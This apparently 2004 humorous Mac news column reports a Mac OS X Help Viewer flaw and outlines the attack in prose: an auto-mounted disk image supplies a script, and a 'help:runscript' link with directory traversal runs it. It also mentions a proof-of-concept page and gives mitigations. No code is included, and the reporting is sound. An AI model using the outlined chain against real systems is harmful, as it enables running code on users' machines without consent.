Woo-hoo, it's like we Mac users have been in Security Issue Heaven recently, isn't it? After years and years of watching forlornly as Windows users had all the fun, Macfolk are finally starting to see a little action these days. First there was that questionable but clever little demo Trojan whereby arbitrary executable code was embedded in the ID3 tags of an MP3 file. Then there was this fake Word 2004 installer floating around, which was just a "delete everything we can" script with a custom icon pasted on top-- not exactly a security hole, since any system that lets you delete any files would be susceptible to that sort of thing, but still, it was a real piece of Mac OS X malware found in the wild.

And now there's this new hole in Mac OS X that apparently lets the bad guys exploit Help Viewer to run code on your system just by getting you to click a single link on a web site they set up. Faithful viewer Bernd Schnitker was the first to inform us that, as detailed by the security web site Secunia, "the 'help' URI handler allows execution of arbitrary local scripts (.scpt) via the classic directory traversal character sequence using 'help:runscript.'" In other words, Help Viewer is allowed to run AppleScripts and the like, provided they're somewhere on your system, and will do so if instructed to via a web link to "help:runscript=..." which specifies where the script resides. The upshot is that some clever folks could slap together a web page that automatically sends you a .dmg disk image (which, with default settings, Safari etc. will automatically mount), waits a little while, and then redirects your browser to the help:runscript URI pointing to the script included on the mounted disk image.

Don't believe it could work? Well, the site insecure.ws not only has a description of the problem, but also put together a proof-of-concept web page that exploits the hole. Click here to see it in action; while it won't actually harm your system, it'll prove that it could if it wanted to; if you haven't messed with any relevant default Safari settings, you'll see a disk image mount on the Desktop, Help Viewer launch, and Terminal spawn a new window informing you that you've been compromised. Don't forget to toss that scary "owned.txt" file that the script slapped into your home directory just to make you sleep a little less soundly at night. (We don't sleep anyway, so we're thinking of keeping it around. It classes up the joint a little.)

For what it's worth, if you want to protect yourself from this sort of thing happening until Apple issues another Security Update, it's not too difficult; you can either tell Safari (or whatever browser you use) not to mount downloaded disk images (uncheck "Open 'safe' files after downloading" in the General Preferences), or better yet, use something like the More Internet preference pane to rename the help URI handler. Geez, three security issues of varying degrees of ickiness in the space of less than six weeks; multiply that by ten, and we'll almost be where Windows is! Enterprise sales, here we come!

This scene was taken from the 5/17/2004 episode:

		Tuesday, 5:36 AM: Another Mac OS X security issue comes to light, and this one has a fun proof-of-concept web page. Meanwhile, Gwyneth Paltrow names her kid "Apple," and the G5 cluster at Virginia Tech may be vanishing from the next list of the top supercomputers...

Other scenes from this episode include:

"It's A... Golden Delicious!": Huzzahs and hosannas to the new little person! We're not sure how closely you follow the entertainment news (you should be studying it like a bloodhound on espresso, because you never know when another Ashton-Demi pairing might send pork belly futures soaring again), but faithful viewer Keith Bradnam informed us over the weekend that, according to the BBC News, the lovely and talented Gwyneth Paltrow gave birth to a healthy baby girl last Friday... Scene

3 to Nowhere With A Bullet: Say, remember just six months ago when Apple (the computer company, not Baby Paltrow, who was merely a human bean at the time) made waves in the hardcore geek community because Virginia Tech managed to build the world's third-fastest supercomputer out of off-the-shelf Power Mac G5s in a matter of months for a cost normally associated less with massive parallel computational clusters and more with, for example, a large fries and a Coke?... Scene

Click on one to see it. Or perhaps you'd like to see the whole episode as originally broadcast?

Bored? Take a trip down memory lane and see what happened One Year Ago, Two Years Ago, Three Years Ago, Four Years Ago, Five Years Ago, or even Six Years Ago today! Or leave your entertainment up to the fates, and see a Random Episode...

What disappoints you most about the video iPod 1.0?
	It doesn't get Cinemax
	It requires far too much physical effort to cram a DVD into the Dock connector
	You can't stick your face in the screen like with the TV in Videodrome
	Showing home movies on the iPod makes it too easy for viewers to escape
	I can fit 140 hours of TV in my pocket, but it sure is a hassle lugging this couch everywhere I go
(63157 votes)